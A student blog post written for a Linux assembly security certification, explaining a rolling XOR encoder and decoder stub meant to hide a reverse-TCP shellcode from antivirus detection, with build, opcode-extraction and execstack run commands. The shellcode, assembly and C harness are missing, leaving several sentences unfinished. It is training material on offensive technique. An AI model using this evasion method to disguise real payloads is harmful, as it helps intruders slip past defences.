This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-924
The task is to:
- Create a custom encoding scheme like the “Insertion Encoder”
- PoC with using execve-stack as the shellcode to encode with your schema and execute
Rolling XOR encoder
Cause most of the known encoders can be easily detected by the AVs, it is very useful to be able to create your own custom encoder.
Let’s create XOR encoder.
As original shellcode we will use
reverse_tcp shellcode from the previous assessments.
For a key we will use random value from 0 to 255. This key will be placed as a first byte of the
encoded_shellcode. Then the XOR operation between first byte of the
encoded_shellcode (first byte is
random_key) is performed. The result will be written to the second byte of the
encoded_shellcode. Then second byte of the
original_shellcode will be XORed with second byte of the
encoded_shellcode and result will be written to the third byte of the
encoded_shellcode and so on.
As a result we get encoded shellcode:
Now we should write shellcode which will decode it and execute.
We will use
JMP-CALL-POP technique to get an address of our shellcode. After that we will save pointer to it in
edi register and zero out
ecx register will store length of the shellcode for the loop.
First byte of the shellcode now moves to
al, second byte moves to
bl. Result of XORing them will be stored in
al and then will be moved to the place where
edi points. After that
edi registers will be incremented and the loop will be executed again, until
ecx register will be equal to zero. After that we will add NOP to replace the last symbol and then we will jump to our decoded shellcode.
Let’s compile it!
nasm -f elf32 -o shellcode.o shellcode.nasm ld -o shellcode shellcode.o objdump -d shellcode -M intel
Let’s extract the opcodes:
objdump -d ./shellcode|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
Here it is:
There is no any null bytes, that’s fine.
We will use
Let’s compile it and RUN!
gcc shellcode.c -z execstack ./a.out
And it works: